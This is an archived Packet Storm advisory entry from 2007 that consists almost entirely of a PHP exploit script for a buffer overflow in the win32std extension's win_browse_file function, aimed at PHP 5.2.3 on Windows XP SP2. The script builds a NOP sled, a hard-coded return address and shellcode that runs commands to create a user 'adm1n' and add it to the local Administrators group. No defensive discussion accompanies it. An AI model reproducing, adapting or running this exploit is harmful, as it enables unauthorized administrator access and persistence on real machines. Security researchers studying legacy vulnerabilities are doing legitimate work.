php523winbrowse-overflow.txt

2007-08-24T00:00:00
ID PACKETSTORM:58797
Type packetstorm
Reporter Nima Ghotbi
Modified 2007-08-24T00:00:00

Description

                                        
                                            `<?php  
  
##########################################################  
###----------------------------------------------------###  
###--------PHP win32std Buffer Overflow Exploit--------###  
###----------------------------------------------------###  
###-Tested on:-PHP 5.2.3-------------------------------###  
###------------Windows XP SP2 Eng----------------------###  
###----------------------------------------------------###  
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###  
###----------------------------------------------------###  
###-Author:--NetJackal---------------------------------###  
###-Email:---nima_501[at]yahoo[dot]com-----------------###  
###-Website:-http://netjackal.by.ru--------------------###  
###----------------------------------------------------###  
##########################################################  
  
  
  
#Add user: [user]=>"adm1n" [password]=>"netjackal"  
$SC=  
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86".  
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8".  
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63".  
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31".  
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61".  
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67".  
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72".  
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D".  
"\x31\x6E\x58";  
  
$RET="\x70\xE6\x16\x01";  
  
$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;  
  
win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*"));  
?>  
  
  
`